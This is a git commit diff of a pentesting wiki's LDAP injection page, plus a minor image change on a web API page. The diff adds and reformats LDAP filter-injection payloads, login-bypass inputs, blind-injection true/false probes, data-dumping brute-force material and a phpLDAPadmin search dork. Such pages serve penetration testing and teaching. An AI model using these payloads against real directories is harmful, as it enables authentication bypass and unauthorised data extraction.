GitBook: [master] 2 pages and 4 assets modified

2024-11-14 00:47:24 +00:00 · 2021-06-08 21:58:39 +00:00 · 2021-06-08 21:58:39 +00:00 · a24d4e91d6
commit a24d4e91d6
parent c2b98f8fb4
6 changed files with 32 additions and 15 deletions
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/pentesting-web/ldap-injection.md
+++ b/pentesting-web/ldap-injection.md
@ -27,30 +27,28 @@
 **\(\|\)** = Absolute FALSE

 For example:  
-\(&\(!\(objectClass=Impresoras\)\)\(uid=s\*\)\)  
-\(&\(objectClass=user\)\(uid=\*\)\)
+`(&(!(objectClass=Impresoras))(uid=s*))  
+(&(objectClass=user)(uid=*))`

 You can access to the database, and this can content information of a lot of different types.

-The backups of LDAP uses the extension _ldif_
-
 **OpenLDAP**: If 2 filters arrive, only executes the first one.  
 **ADAM or Microsoft LDS**: With 2 filters they throw an error.  
 **SunOne Directory Server 5.0**: Execute both filters.

 **It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.**

-The filter has to start with: _&_ or _\|_  
-Example: _\(&\(directory=val1\)\(folder=public\)\)_
+The filter has to start with: `&` or `|`  
+Example: `(&(directory=val1)(folder=public))`

-\(&\(objectClass=VALUE1\)\(type=Epson\*\)\)  
-VALUE1 = _\*\)\(ObjectClass=\*\)\)\(&\(objectClass=void_
+`(&(objectClass=VALUE1)(type=Epson*))  
+VALUE1 = *)(ObjectClass=*))(&(objectClass=void`

-Then: _\(&\(objectClass=**\*\)\(ObjectClass=\*\)\)**_ will be the first filter \(the one executed\).
+Then: `(&(objectClass=`**`*)(ObjectClass=*))`** will be the first filter \(the one executed\).

 ## Login Bypass

-LDAP supports several formats to store the password: clear, md5, smd5, sh1, ssha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
+LDAP supports several formats to store the password: clear, md5, smd5, sh1, sha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.

 ```bash
 user=*
@ -92,7 +90,7 @@ password=pwd
 ```bash
 username = admin)(!(&(|
 pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSO then the user is admin and the password check is True.
+--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
 ```

 ```bash
@ -107,12 +105,29 @@ password=any
 --> (&(uid=admin)) (| (|) (webpassword=any))
 ```

+### Lists
+
 [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt)  
-[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)  
-[LDAP\_authBypass](https://feelsec.info/wp-content/uploads/2018/11/LDAP_authBypass.txt)
+[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)

 ## Blind LDAP Injection

+You may force False or True responses to check if any data is returned and confirm a possible Blind LDAP Injection:
+
+```bash
+#This will result on True, so some information will be shown
+Payload: *)(objectClass=*))(&objectClass=void
+Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
+```
+
+```bash
+#This will result on True, so no information will be returned or shown
+Payload: void)(objectClass=void))(&objectClass=void
+Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
+```
+
+### Dump data
+
 You can iterate over the ascii letters, digits and symbols:

 ```bash
@ -130,7 +145,7 @@ You can iterate over the ascii letters, digits and symbols:

 ### **Discover valid LDAP fields**

-LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of **\*\*\[**default LDAP attributes here**\]\(**[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP Injection/Intruder/LDAP\_attributes.txt](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**\)**.\*\*
+LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of [**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt).

 ```python
 #!/usr/bin/python3
@ -189,5 +204,7 @@ for i in range(50):
 intitle:"phpLDAPadmin" inurl:cmd.php
 ```

+## More Payloads
+
 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection)

--- a/pentesting/pentesting-web/web-api-pentesting.md
+++ b/pentesting/pentesting-web/web-api-pentesting.md
@ -25,7 +25,7 @@ These kind of APIs may be [**vulnerable to XXE**](../../pentesting-web/xxe-xee-x

 You could also try to use CDATA tags to insert payloads \(as long as the XML is valid\)

-![](../../.gitbook/assets/image%20%28535%29.png)
+![](../../.gitbook/assets/image%20%28537%29.png)

 ### Check Access